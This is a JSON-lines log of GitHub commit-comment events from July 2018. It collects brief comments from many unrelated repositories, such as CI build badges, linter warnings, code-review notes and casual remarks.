{"id":"7968195145","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714877,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-16T00:19:39Z","updated_at":"2018-07-16T00:19:39Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-16T00:19:39Z"}
{"id":"7968197389","type":"CommitCommentEvent","actor":{"login":"JonathanRugama"},"repo":{"name":"JonathanRugama/TareaProgramacion2"},"payload":{"comment":{"id":29714882,"position":41,"line":41,"path":"proyectoServlets/src/Ingresar.java","commit_id":"e0980c6151583d7dfe5fdc6e259e381bdd5a8d1c","created_at":"2018-07-16T00:21:27Z","updated_at":"2018-07-16T00:21:27Z","author_association":"OWNER","body":"Se ponen en minúscula tal y como esta en formulario"}},"created_at":"2018-07-16T00:21:27Z"}
{"id":"7968206944","type":"CommitCommentEvent","actor":{"login":"spino30"},"repo":{"name":"spino30/mlandpp-uniandes"},"payload":{"comment":{"id":29714892,"position":null,"line":null,"path":null,"commit_id":"6c7802c98079d95571f998f0a317c093df9946ee","created_at":"2018-07-16T00:29:38Z","updated_at":"2018-07-16T00:29:38Z","author_association":"OWNER","body":"Entrega"}},"created_at":"2018-07-16T00:29:38Z"}
{"id":"7968208394","type":"CommitCommentEvent","actor":{"login":"101208"},"repo":{"name":"erik78se/robojoy"},"payload":{"comment":{"id":29714896,"position":null,"line":null,"path":null,"commit_id":"cf41b533f7b943b3f1a7ee603d67e91cc7b535a0","created_at":"2018-07-16T00:30:46Z","updated_at":"2018-07-16T00:30:46Z","author_association":"NONE","body":"yes brother "}},"created_at":"2018-07-16T00:30:46Z"}
{"id":"7968208424","type":"CommitCommentEvent","actor":{"login":"brayanlc"},"repo":{"name":"brayanlc/udemy-heroes"},"payload":{"comment":{"id":29714897,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-16T00:30:48Z","updated_at":"2018-07-16T00:30:48Z","author_association":"OWNER","body":"## Joker \r\nEste es mi villano favorito :star: "}},"created_at":"2018-07-16T00:30:48Z"}
{"id":"7968208777","type":"CommitCommentEvent","actor":{"login":"101208"},"repo":{"name":"erik78se/robojoy"},"payload":{"comment":{"id":29714899,"position":1,"line":1,"path":".github/CODEOWNERS","commit_id":"cf41b533f7b943b3f1a7ee603d67e91cc7b535a0","created_at":"2018-07-16T00:31:04Z","updated_at":"2018-07-16T00:31:04Z","author_association":"NONE","body":"how are you "}},"created_at":"2018-07-16T00:31:04Z"}
{"id":"7968208975","type":"CommitCommentEvent","actor":{"login":"tnayanam"},"repo":{"name":"tnayanam/WebApi"},"payload":{"comment":{"id":29714900,"position":8,"line":20,"path":"Baseline/CountingKs/CountingKs/Controllers/FoodsController.cs","commit_id":"6e43a753a47648edd3706f0d7529b58fd0eaae15","created_at":"2018-07-16T00:31:14Z","updated_at":"2018-07-16T00:31:14Z","author_association":"OWNER","body":"![sd](https://user-images.githubusercontent.com/17131576/42739948-022109d4-886e-11e8-8931-674021d2bb2d.png)\r\n"}},"created_at":"2018-07-16T00:31:14Z"}
{"id":"7968212633","type":"CommitCommentEvent","actor":{"login":"stooperpig"},"repo":{"name":"LoSer31/Hondo"},"payload":{"comment":{"id":29714909,"position":null,"line":null,"path":null,"commit_id":"49fa40dfb6325fec872af5045be1e1278b50a282","created_at":"2018-07-16T00:34:26Z","updated_at":"2018-07-16T00:34:26Z","author_association":"COLLABORATOR","body":"Make sure you give each of your selects a name attribute.    For example the dose interval select could have a name like doseInterval.   Also, your checkboxes should each have a unique name.    So the height checkbox could be eventHeight.   I added event to the front of it so that you know it's related to events.   BMI could be eventBMI to follow that pattern. \r\n\r\nI like the reset button.    You don't need a save and submit.    It should be one or the other (I like your save button better because it has the onclick handlers which we can define next)"}},"created_at":"2018-07-16T00:34:26Z"}
{"id":"7968212720","type":"CommitCommentEvent","actor":{"login":"brayanlc"},"repo":{"name":"brayanlc/udemy-heroes"},"payload":{"comment":{"id":29714910,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-16T00:34:30Z","updated_at":"2018-07-16T00:34:30Z","author_association":"OWNER","body":"## Notas\r\nEntiendo porque agregaste a Deadshot, lo necesitamos "}},"created_at":"2018-07-16T00:34:30Z"}
{"id":"7968221371","type":"CommitCommentEvent","actor":{"login":"jonoabroad"},"repo":{"name":"puffnfresh/nix-files"},"payload":{"comment":{"id":29714934,"position":null,"line":null,"path":null,"commit_id":"cc21f72ded2d2653084ae73d07afd91555b90335","created_at":"2018-07-16T00:41:48Z","updated_at":"2018-07-16T00:41:48Z","author_association":"NONE","body":"I feel so much better that others are here stalking Brian's Nix config."}},"created_at":"2018-07-16T00:41:48Z"}
{"id":"7968225478","type":"CommitCommentEvent","actor":{"login":"TyrionFront"},"repo":{"name":"TyrionFront/project-lvl1-s304"},"payload":{"comment":{"id":29714943,"position":null,"line":null,"path":null,"commit_id":"06f82893750b67b1c15030db283be977629d2d6f","created_at":"2018-07-16T00:45:10Z","updated_at":"2018-07-16T00:45:10Z","author_association":"OWNER","body":"Deletions is this file are the answer on why it is strongly recommended to revember Math basics )"}},"created_at":"2018-07-16T00:45:10Z"}
{"id":"7968227044","type":"CommitCommentEvent","actor":{"login":"IrishBrian"},"repo":{"name":"mspnp/architecture-center"},"payload":{"comment":{"id":29714946,"position":177,"line":177,"path":"docs/example-scenario/hpc/video-rendering.md","commit_id":"ecc1bd3be551262e643364888f0ae38f82326252","created_at":"2018-07-16T00:46:21Z","updated_at":"2018-07-16T00:46:21Z","author_association":"NONE","body":"Cheers"}},"created_at":"2018-07-16T00:46:21Z"}
{"id":"7968228352","type":"CommitCommentEvent","actor":{"login":"TyrionFront"},"repo":{"name":"TyrionFront/project-lvl1-s304"},"payload":{"comment":{"id":29714949,"position":null,"line":null,"path":null,"commit_id":"06f82893750b67b1c15030db283be977629d2d6f","created_at":"2018-07-16T00:47:28Z","updated_at":"2018-07-16T00:47:28Z","author_association":"OWNER","body":"Deletions in this file are the answer on why it is strongly recommended to remember Math basics )"}},"created_at":"2018-07-16T00:47:28Z"}
{"id":"7968232568","type":"CommitCommentEvent","actor":{"login":"leo424y"},"repo":{"name":"twgo/siann1-hak8_boo5-hing5"},"payload":{"comment":{"id":29714953,"position":21,"line":21,"path":"util/data/perturb_data_dir_encode.sh","commit_id":"347309234195802922422825fa36fead7ed167a7","created_at":"2018-07-16T00:50:56Z","updated_at":"2018-07-16T00:50:56Z","author_association":"CONTRIBUTOR","body":" 更正：+  echo \" $0 alaw data/train_si284 data/train_si284p\"\r\n由於是提示暫不影響scrip"}},"created_at":"2018-07-16T00:50:56Z"}
{"id":"7968234286","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714955,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-16T00:52:16Z","updated_at":"2018-07-16T00:52:16Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1694 of 1694 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.03%25-green.png)</a>\n"}},"created_at":"2018-07-16T00:52:16Z"}
{"id":"7968236895","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29714957,"position":null,"line":null,"path":null,"commit_id":"1a0c27bcaa32d1f039ef43b5e262936cd6a69df0","created_at":"2018-07-16T00:54:24Z","updated_at":"2018-07-16T00:54:24Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.342`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/404260129) :tada:"}},"created_at":"2018-07-16T00:54:24Z"}
{"id":"7968242606","type":"CommitCommentEvent","actor":{"login":"magcius"},"repo":{"name":"beholdnec/model-viewer"},"payload":{"comment":{"id":29714962,"position":169,"line":271,"path":"src/zelview/f3dex2.ts","commit_id":"9a614c091e6bf4d8d8e57c91d3257e002b54dfc2","created_at":"2018-07-16T00:59:09Z","updated_at":"2018-07-16T00:59:09Z","author_association":"NONE","body":"I believe this is supposed to read `state.textureTiles[1].addr`."}},"created_at":"2018-07-16T00:59:09Z"}
{"id":"7968246183","type":"CommitCommentEvent","actor":{"login":"stevearoonie"},"repo":{"name":"stevearoonie/react-select-plus"},"payload":{"comment":{"id":29714971,"position":4,"line":935,"path":"dist/react-select-plus.es.js","commit_id":"9e4932d97a54955c5e678846a9766b21ba185ff4","created_at":"2018-07-16T01:01:34Z","updated_at":"2018-07-16T01:01:34Z","author_association":"OWNER","body":"Thanks a lot."}},"created_at":"2018-07-16T01:01:34Z"}
{"id":"7968246615","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714972,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"f031a219a12db653a3e71c079e9b68be59641cd5","created_at":"2018-07-16T01:01:52Z","updated_at":"2018-07-16T01:01:52Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command/random (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/random\" in any of:"}},"created_at":"2018-07-16T01:01:52Z"}
{"id":"7968246620","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714973,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"f031a219a12db653a3e71c079e9b68be59641cd5","created_at":"2018-07-16T01:01:52Z","updated_at":"2018-07-16T01:01:52Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command/random (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/random\" in any of:"}},"created_at":"2018-07-16T01:01:52Z"}
{"id":"7968246630","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714974,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"f031a219a12db653a3e71c079e9b68be59641cd5","created_at":"2018-07-16T01:01:53Z","updated_at":"2018-07-16T01:01:53Z","author_association":"NONE","body":"go vet: cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/random\" in any of:"}},"created_at":"2018-07-16T01:01:53Z"}
{"id":"7968246637","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714975,"position":7,"line":null,"path":"pkg/command/random/random.go","commit_id":"f031a219a12db653a3e71c079e9b68be59641cd5","created_at":"2018-07-16T01:01:53Z","updated_at":"2018-07-16T01:01:53Z","author_association":"NONE","body":"golint: exported function NewRandomCommand should have comment or be unexported"}},"created_at":"2018-07-16T01:01:53Z"}
{"id":"7968246946","type":"CommitCommentEvent","actor":{"login":"plfoley10"},"repo":{"name":"plfoley10/UMKC-CSEE-5590---Big-Data-Programming-Labs"},"payload":{"comment":{"id":29714976,"position":null,"line":null,"path":null,"commit_id":"7de21613239a2eb3ba42e68141dfc1c9b6c80682","created_at":"2018-07-16T01:02:06Z","updated_at":"2018-07-16T01:02:06Z","author_association":"OWNER","body":"Added Jeffery Morgan's part 2."}},"created_at":"2018-07-16T01:02:06Z"}
{"id":"7968249031","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29714981,"position":null,"line":null,"path":null,"commit_id":"a83590ee67294ae053eaad0a7b0702cbdeaa4aff","created_at":"2018-07-16T01:03:36Z","updated_at":"2018-07-16T01:03:36Z","author_association":"CONTRIBUTOR","body":"Compiling..."}},"created_at":"2018-07-16T01:03:36Z"}
{"id":"7968249440","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29714983,"position":null,"line":null,"path":null,"commit_id":"a83590ee67294ae053eaad0a7b0702cbdeaa4aff","created_at":"2018-07-16T01:03:55Z","updated_at":"2018-07-16T01:03:55Z","author_association":"CONTRIBUTOR","body":"Error: Your code is bad.\r\nDid not compile. "}},"created_at":"2018-07-16T01:03:55Z"}
{"id":"7968252230","type":"CommitCommentEvent","actor":{"login":"khanage"},"repo":{"name":"khanage/purescript-indexed-monad"},"payload":{"comment":{"id":29714987,"position":null,"line":null,"path":null,"commit_id":"cf105603868fddc2bcc8eb14778aa8645599929f","created_at":"2018-07-16T01:06:03Z","updated_at":"2018-07-16T01:06:03Z","author_association":"OWNER","body":"It uses psc-package instead, which is the way forward AFAIK?"}},"created_at":"2018-07-16T01:06:03Z"}
{"id":"7968254142","type":"CommitCommentEvent","actor":{"login":"ehei"},"repo":{"name":"cyber-dojo-languages/java-junit"},"payload":{"comment":{"id":29714991,"position":null,"line":null,"path":null,"commit_id":"8ee4de5e14a31e2ede9c40373977802417aeb818","created_at":"2018-07-16T01:07:30Z","updated_at":"2018-07-16T01:07:30Z","author_association":"NONE","body":"Shorter lines, easier to read...excellent! What's next to get this pushed to the live site?"}},"created_at":"2018-07-16T01:07:30Z"}
{"id":"7968255224","type":"CommitCommentEvent","actor":{"login":"guilolo"},"repo":{"name":"kaiqueks02/inicio"},"payload":{"comment":{"id":29714992,"position":null,"line":null,"path":null,"commit_id":"4228e2a236abe359bbe855d337f245736e028222","created_at":"2018-07-16T01:08:15Z","updated_at":"2018-07-16T01:08:15Z","author_association":"NONE","body":"seu porcão\r\n"}},"created_at":"2018-07-16T01:08:15Z"}
{"id":"7968255732","type":"CommitCommentEvent","actor":{"login":"FearlessZander"},"repo":{"name":"InitialFail/driftin-bots"},"payload":{"comment":{"id":29714995,"position":null,"line":null,"path":null,"commit_id":"12bfa4aa0dd04d4634687aa8703f777bdc07725e","created_at":"2018-07-16T01:08:39Z","updated_at":"2018-07-16T01:08:39Z","author_association":"NONE","body":"How do i do this?\n\n\n\n\nOn Monday, July 16, 2018, InitialFail <notifications@github.com> wrote:\n\n> If by \"last part\" you mean opening in separate Chrome user data\n> directories, then just launch Chrome multiple times with different\n> --user-data-dir values like --user-data-dir=/tmp/profile01,\n> --user-data-dir=/tmp/profile02, --user-data-dir=/tmp/profile03, etc. If\n> you're still confused, you should learn about the command line.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/InitialFail/driftin-bots/commit/12bfa4aa0dd04d4634687aa8703f777bdc07725e#commitcomment-29713499>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnUi7y5HZPKOKtonRQavgOaQ5KXXw-wQks5uG3UzgaJpZM4VPzZi>\n> .\n>\n"}},"created_at":"2018-07-16T01:08:39Z"}
{"id":"7968257020","type":"CommitCommentEvent","actor":{"login":"greg-1-anderson"},"repo":{"name":"greg-1-anderson/gk-8"},"payload":{"comment":{"id":29714999,"position":null,"line":null,"path":null,"commit_id":"777f37d02b5bd977e913507c6cd26cc53bac0e55","created_at":"2018-07-16T01:09:37Z","updated_at":"2018-07-16T01:09:37Z","author_association":"OWNER","body":"Created multidev environment [gk-8#ci-159](https://dashboard.pantheon.io/sites/5cbd78f8-3a96-492a-beb0-f892421708d8#ci-159).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-159-gk-8.pantheonsite.io/)"}},"created_at":"2018-07-16T01:09:37Z"}
{"id":"7968258418","type":"CommitCommentEvent","actor":{"login":"chenjn2010"},"repo":{"name":"chenjn2010/weed_detection"},"payload":{"comment":{"id":29715000,"position":null,"line":null,"path":null,"commit_id":"9e6754850d27337fad1afec655dc2b616e8715f7","created_at":"2018-07-16T01:10:39Z","updated_at":"2018-07-16T01:10:39Z","author_association":"OWNER","body":"\"seed growth algorithm\""}},"created_at":"2018-07-16T01:10:39Z"}
{"id":"7968264240","type":"CommitCommentEvent","actor":{"login":"saadeh73"},"repo":{"name":"saadeh73/facedroid"},"payload":{"comment":{"id":29715005,"position":null,"line":null,"path":null,"commit_id":"881c4f05dae86d897262c8845fb36a16f4a8e02e","created_at":"2018-07-16T01:14:40Z","updated_at":"2018-07-16T01:14:40Z","author_association":"OWNER","body":"881c4f05dae86d897262c8845fb36a16f4a8e02e\r\nhttps://github.com/saadeh73/facedroid/blob/master/alart.zip\r\n"}},"created_at":"2018-07-16T01:14:40Z"}
{"id":"7968264371","type":"CommitCommentEvent","actor":{"login":"Duboshi"},"repo":{"name":"Duboshi/OI"},"payload":{"comment":{"id":29715006,"position":null,"line":null,"path":null,"commit_id":"518128c9502b649a92c9fac316907e00c5b0108e","created_at":"2018-07-16T01:14:45Z","updated_at":"2018-07-16T01:14:45Z","author_association":"OWNER","body":"A splay tree is a self-adjusting binary search tree with the additional property that recently accessed elements are quick to access again."}},"created_at":"2018-07-16T01:14:45Z"}
{"id":"7968264449","type":"CommitCommentEvent","actor":{"login":"Kodehawa"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29715007,"position":null,"line":null,"path":null,"commit_id":"a83590ee67294ae053eaad0a7b0702cbdeaa4aff","created_at":"2018-07-16T01:14:48Z","updated_at":"2018-07-16T01:14:48Z","author_association":"MEMBER","body":"q-q"}},"created_at":"2018-07-16T01:14:48Z"}
{"id":"7968265340","type":"CommitCommentEvent","actor":{"login":"ReemHazzaa"},"repo":{"name":"ReemHazzaa/SavCar"},"payload":{"comment":{"id":29715011,"position":null,"line":null,"path":null,"commit_id":"27f790439a8a16704977bcd9530ad6e936eccecb","created_at":"2018-07-16T01:15:21Z","updated_at":"2018-07-16T01:15:21Z","author_association":"OWNER","body":"1.3\tScope of the system  \r\n\tWe aim to build the system to monitor a vehicle driver’s heart beat and breathing rate simultaneously while driving. If the measured values are abnormal, the system will fire an alarm for a certain period of time and waits for driver’s response. If no response performed until the alarm goes off on its own, the system will enters auto-parking phase and sends driver’s status and location to nearest hospital. \r\n"}},"created_at":"2018-07-16T01:15:21Z"}
{"id":"7968265856","type":"CommitCommentEvent","actor":{"login":"Melanmare"},"repo":{"name":"Melanmare/LeetcodeSolutions"},"payload":{"comment":{"id":29715012,"position":null,"line":null,"path":null,"commit_id":"092a8ac8a74194e9f9fce99e8395ece98f1b0e61","created_at":"2018-07-16T01:15:45Z","updated_at":"2018-07-16T01:15:45Z","author_association":"OWNER","body":"use hashset to deduplicate"}},"created_at":"2018-07-16T01:15:45Z"}
{"id":"7968267195","type":"CommitCommentEvent","actor":{"login":"dubslow"},"repo":{"name":"LeelaChessZero/lc0"},"payload":{"comment":{"id":29715014,"position":3,"line":2,"path":"src/version.inc","commit_id":"a530848dad2817dc592e0167f29274677c0884e0","created_at":"2018-07-16T01:16:39Z","updated_at":"2018-07-16T01:16:39Z","author_association":"MEMBER","body":"This was a major mistake. The rule for this project ought to be that a commit (or PR) either changes *only* the version, or it changes anything else at all -- never both."}},"created_at":"2018-07-16T01:16:39Z"}
{"id":"7968267762","type":"CommitCommentEvent","actor":{"login":"dubslow"},"repo":{"name":"LeelaChessZero/lc0"},"payload":{"comment":{"id":29715016,"position":null,"line":null,"path":null,"commit_id":"a530848dad2817dc592e0167f29274677c0884e0","created_at":"2018-07-16T01:17:05Z","updated_at":"2018-07-16T01:17:05Z","author_association":"MEMBER","body":"Glad to see this critical work make it into main! Promotion inc (never mind faster loading times)!"}},"created_at":"2018-07-16T01:17:05Z"}
{"id":"7968267803","type":"CommitCommentEvent","actor":{"login":"Awzaw"},"repo":{"name":"Infernus101/KitUI"},"payload":{"comment":{"id":29715017,"position":null,"line":null,"path":null,"commit_id":"e7e89e3d0de9cacdc3ad5859ebff340a31b44fdc","created_at":"2018-07-16T01:17:07Z","updated_at":"2018-07-16T01:17:07Z","author_association":"CONTRIBUTOR","body":"Dear @Infernus101:\nI regret to inform you that the release you submitted, named \"**KitUI**\" (v1.3.0), for the project [KitUI](https://poggit.pmmp.io/ci/Infernus101/KitUI/KitUI) on 2018-07-15T06:59:57.000Z, has been rejected.\n\nPlugins cannot yet claim compatibility with 4.0.0.\n\nPlease resolve the issues listed above and submit the updated plugin again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-16T01:17:07Z"}
{"id":"7968268114","type":"CommitCommentEvent","actor":{"login":"seven1m"},"repo":{"name":"kanaka/mal"},"payload":{"comment":{"id":29715018,"position":23,"line":27,"path":"perf.mal","commit_id":"699f0ad23aca21076edb6a51838d879ca580ffd5","created_at":"2018-07-16T01:17:20Z","updated_at":"2018-07-16T01:17:20Z","author_association":"CONTRIBUTOR","body":"Why does this divide by `3`? Shouldn't it divide by `max-secs` to get the iters/sec?"}},"created_at":"2018-07-16T01:17:20Z"}
{"id":"7968269930","type":"CommitCommentEvent","actor":{"login":"phprookiehbb"},"repo":{"name":"phprookiehbb/hbbtest"},"payload":{"comment":{"id":29715021,"position":null,"line":null,"path":null,"commit_id":"7c596e49a2fd543217d88fe51fb9e023b4f554e2","created_at":"2018-07-16T01:18:35Z","updated_at":"2018-07-16T01:18:35Z","author_association":"OWNER","body":"正则表达式"}},"created_at":"2018-07-16T01:18:35Z"}
{"id":"7968271766","type":"CommitCommentEvent","actor":{"login":"alexlyee"},"repo":{"name":"alexlyee/Unturned-Server-Manager"},"payload":{"comment":{"id":29715025,"position":null,"line":null,"path":null,"commit_id":"44102554af5d8892573825db7f20ec68d01a886d","created_at":"2018-07-16T01:19:55Z","updated_at":"2018-07-16T01:19:55Z","author_association":"OWNER","body":"> Version number updated: 2.4.4\r\n\r\n- Introduced options to fix SteamCMD and Unturned.\r\n   - The SteamCMD process now assists with common errors that take place with logging in. _It's double the length of code._\r\n   - The Unturned process now actually saves the type of server.\r\n- I found a bug that stopped the server start function from ever working and squashed it.\r\n- The settings menu is fully functioning.\r\n- The Help me host menu is working _I think :?_"}},"created_at":"2018-07-16T01:19:55Z"}
{"id":"7968285083","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29715043,"position":null,"line":null,"path":null,"commit_id":"c7148dd2d3d8a994422277123bf2641ce1562556","created_at":"2018-07-16T01:29:11Z","updated_at":"2018-07-16T01:29:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Код: отрефакторить кусок кода с обработкой SystemType и объектов.](https://trello.com/c/gP7bHxId/56-%D0%BA%D0%BE%D0%B4-%D0%BE%D1%82%D1%80%D0%B5%D1%84%D0%B0%D0%BA%D1%82%D0%BE%D1%80%D0%B8%D1%82%D1%8C-%D0%BA%D1%83%D1%81%D0%BE%D0%BA-%D0%BA%D0%BE%D0%B4%D0%B0-%D1%81-%D0%BE%D0%B1%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%BA%D0%BE%D0%B9-systemtype-%D0%B8-%D0%BE%D0%B1%D1%8A%D0%B5%D0%BA%D1%82%D0%BE%D0%B2)"}},"created_at":"2018-07-16T01:29:11Z"}
{"id":"7968285356","type":"CommitCommentEvent","actor":{"login":"rjkaifa666"},"repo":{"name":"rjkaifa666/hello-java"},"payload":{"comment":{"id":29715044,"position":null,"line":null,"path":null,"commit_id":"0991e29aa4b4ce8dfef4f9f1b0b9d528eb2356ef","created_at":"2018-07-16T01:29:24Z","updated_at":"2018-07-16T01:29:24Z","author_association":"OWNER","body":"HelloWorld"}},"created_at":"2018-07-16T01:29:24Z"}
{"id":"7968285900","type":"CommitCommentEvent","actor":{"login":"esa-n"},"repo":{"name":"esa-n/android_kernel_lge_hammerhead"},"payload":{"comment":{"id":29715045,"position":null,"line":null,"path":null,"commit_id":"c009c09f2f8413b68fd9a54c547ffb497ab75d6a","created_at":"2018-07-16T01:29:46Z","updated_at":"2018-07-16T01:29:46Z","author_association":"OWNER","body":"Hello.This is not released with own usage."}},"created_at":"2018-07-16T01:29:46Z"}
{"id":"7968286004","type":"CommitCommentEvent","actor":{"login":"LoSer31"},"repo":{"name":"LoSer31/Hondo"},"payload":{"comment":{"id":29715046,"position":null,"line":null,"path":null,"commit_id":"49fa40dfb6325fec872af5045be1e1278b50a282","created_at":"2018-07-16T01:29:50Z","updated_at":"2018-07-16T01:29:50Z","author_association":"OWNER","body":"I think I've got the updates right in v5.\r\n"}},"created_at":"2018-07-16T01:29:50Z"}
{"id":"7968288930","type":"CommitCommentEvent","actor":{"login":"adamzerella"},"repo":{"name":"govau/ausgov"},"payload":{"comment":{"id":29715055,"position":4,"line":46,"path":"package.json","commit_id":"998803fa2639db089947c2840c55b29f4d6cebc5","created_at":"2018-07-16T01:31:42Z","updated_at":"2018-07-16T01:31:42Z","author_association":"MEMBER","body":"@sukhrajghuman These needed to be dependencies"}},"created_at":"2018-07-16T01:31:42Z"}
{"id":"7968289075","type":"CommitCommentEvent","actor":{"login":"adamzerella"},"repo":{"name":"govau/ausgov"},"payload":{"comment":{"id":29715056,"position":5,"line":47,"path":"package.json","commit_id":"998803fa2639db089947c2840c55b29f4d6cebc5","created_at":"2018-07-16T01:31:48Z","updated_at":"2018-07-16T01:31:48Z","author_association":"MEMBER","body":"@sukhrajghuman These needed to be dependencies"}},"created_at":"2018-07-16T01:31:48Z"}
{"id":"7968290217","type":"CommitCommentEvent","actor":{"login":"Neredun"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29715057,"position":null,"line":null,"path":null,"commit_id":"277337f692bb134c5afebea286b1ea12aa0dd07a","created_at":"2018-07-16T01:32:32Z","updated_at":"2018-07-16T01:32:32Z","author_association":"NONE","body":"Is there any possibility to change this? Gilneas is pretty much a mess right now, so can we make worgens start on stormwind with his racials already learned? (Until Gilneas is on a completable state of course)"}},"created_at":"2018-07-16T01:32:32Z"}
{"id":"7968292958","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29715063,"position":null,"line":null,"path":null,"commit_id":"271f9f272cc6adb430d50ac5ef16a09150abf62e","created_at":"2018-07-16T01:34:20Z","updated_at":"2018-07-16T01:34:20Z","author_association":"OWNER","body":"Collision 744.12~744.18"}},"created_at":"2018-07-16T01:34:20Z"}
{"id":"7968294808","type":"CommitCommentEvent","actor":{"login":"weiyushit"},"repo":{"name":"weiyushit/ComBUSTion"},"payload":{"comment":{"id":29715067,"position":null,"line":null,"path":null,"commit_id":"767ac1520e6650cb305c611cc7b3c6c8a5328b3e","created_at":"2018-07-16T01:35:37Z","updated_at":"2018-07-16T01:35:37Z","author_association":"OWNER","body":"changed file name\r\n"}},"created_at":"2018-07-16T01:35:37Z"}
{"id":"7968299805","type":"CommitCommentEvent","actor":{"login":"912659935"},"repo":{"name":"912659935/-"},"payload":{"comment":{"id":29715075,"position":null,"line":null,"path":null,"commit_id":"21b823dc817de330cae2199408072de033f05716","created_at":"2018-07-16T01:39:05Z","updated_at":"2018-07-16T01:39:05Z","author_association":"OWNER","body":"hll"}},"created_at":"2018-07-16T01:39:05Z"}
{"id":"7968301953","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29715078,"position":null,"line":null,"path":null,"commit_id":"0a8ef45d23c2ce809a6373e45cb403fe6d1964b7","created_at":"2018-07-16T01:40:26Z","updated_at":"2018-07-16T01:40:26Z","author_association":"CONTRIBUTOR","body":"@Etaglibash amigo mio es que a mi me sale que ya son etiquetas viejas, yo solo me guió por el reporte de traducción y por el repositorio de los Ruso https://github.com/Ludeon/RimWorld-ru y este otro https://github.com/RimWorld-zh/RimWorld-English  nose que podría ser el inconveniente, tal vez la versión de tu rimworld por que desde la 1953 cambiaron esas etiquetas y ahora mismo si pones esas salen los errores en el reporte de traducción, nose si te has fijado pero ahora ya estamos en la 1964 y todo funciona así como esta."}},"created_at":"2018-07-16T01:40:26Z"}
